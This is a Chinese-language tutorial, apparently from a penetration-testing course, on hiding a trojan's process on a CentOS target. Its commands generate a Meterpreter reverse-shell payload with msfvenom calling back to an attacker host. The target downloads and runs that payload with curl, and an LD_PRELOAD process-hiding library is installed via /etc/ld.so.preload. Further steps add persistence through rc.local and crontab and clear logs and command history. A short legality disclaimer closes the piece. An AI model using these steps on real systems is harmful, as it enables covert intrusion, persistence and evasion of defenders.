隐藏进程名的具体步骤:

  1. 环境准备

    • 确保你有两台机器:一台作为攻击者(Kali Linux),另一台作为目标(CentOS 7.6)。
    • 配置网络,使两者可以互相访问。
  2. 生成Payload

    • 在Kali Linux上使用msfvenom命令生成一个payload:
      msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -b "\x00" -f elf -o /var/www/html/xuegod-ghost
      
    • 这个命令会创建一个ELF格式的文件,用于在目标系统上执行。
  3. 启动Web服务

    • 在Kali Linux上启动Apache服务以提供payload下载:
      systemctl start apache2
      
  4. 配置Metasploit侦听器

    • 在Kali Linux上配置Metasploit Framework侦听器:
      msfdb run
      use exploit/multi/handler
      set payload linux/x64/meterpreter/reverse_tcp
      set lhost 192.168.1.53
      set lport 4444
      run
      
  5. 下载并运行Payload

    • 在CentOS目标系统上下载payload并运行:
      curl http://192.168.1.53/xuegod-ghost -o xuegod-ghost
      chmod +x xuegod-ghost
      ./xuegod-ghost &
      
  6. 隐藏进程

    • 编写一个恶意库文件(如processhider.c),该文件将被加载到所有进程中,并隐藏特定的进程名。
  7. 上传和编译恶意库

    • processhider.c上传到CentOS系统,并编译成共享库(如libc2.28.so):
      gcc -Wall -fPIC -shared -o libc2.28.so processhider.c -ldl
      
  8. 配置/etc/ld.so.preload

    • 将编译好的恶意库文件路径添加到/etc/ld.so.preload文件中,以便系统在执行程序时自动加载:
      echo /usr/local/lib/libc2.28.so >> /etc/ld.so.preload
      
  9. 重新创建侦听

    • 在Metasploit上重新启动侦听器以连接隐藏的进程。
  10. 运行隐藏的Payload

    • 再次运行xuegod-ghost,此时该进程不会出现在ps命令的输出中。
  11. 恢复进程可见性

    • 删除恶意库文件并清空/etc/ld.so.preload文件以恢复进程的可见性:
      rm -rf /usr/local/lib/libc2.28.so
      echo > /etc/ld.so.preload
      
  12. 脚本自动化

    • 创建一个自动化脚本(如x.sh),该脚本自动化下载、编译、执行payload,以及配置隐藏进程。
  13. 配置开机启动和计划任务

    • 将脚本添加到/etc/rc.d/rc.local以实现开机自启动,或在/etc/crontab中设置计划任务。
  14. 系统日志清理

    • 清理系统日志以减少被发现的痕迹,包括删除历史命令和访问日志。

注意事项:

  • 隐藏进程的技术可以用于逃避检测,但应当在合法的渗透测试和安全研究中使用。
  • 确保你有适当的权限和授权来对目标系统进行操作。
  • 清理日志时要谨慎,以避免破坏系统的正常运行。

通过上述步骤,你可以在Linux系统中隐藏木马程序进程,使其在常规的进程查看工具中不可见。这种技术在渗透测试中非常有用,但也可能被用于恶意目的,因此使用时需要严格遵守法律和道德规范。

05-24 13:10